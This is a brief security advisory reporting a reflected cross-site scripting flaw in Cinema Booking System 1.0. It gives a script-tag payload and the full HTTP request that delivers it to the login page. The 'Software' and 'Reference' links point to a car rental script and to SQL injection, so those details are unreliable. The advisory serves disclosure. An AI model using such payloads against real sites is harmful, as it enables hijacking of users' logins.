## Title: Cinema Booking System-1.0 XSS-Reflected ## Author: nu11secur1ty ## Date: 09/05/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/car-rental-script/ ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload kfimq"><script>alert(1)</script>k0a57 was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response. The attacker can trick all users of this system into visiting a very DANGEROUS URL address, and the worst thing is when they try to log in to this system, by using his malicious link! STATUS: HIGH-CRITICAL Vulnerability [+]Testing Payload: ``` GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLogin HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html) ## Time spent: 00:17:00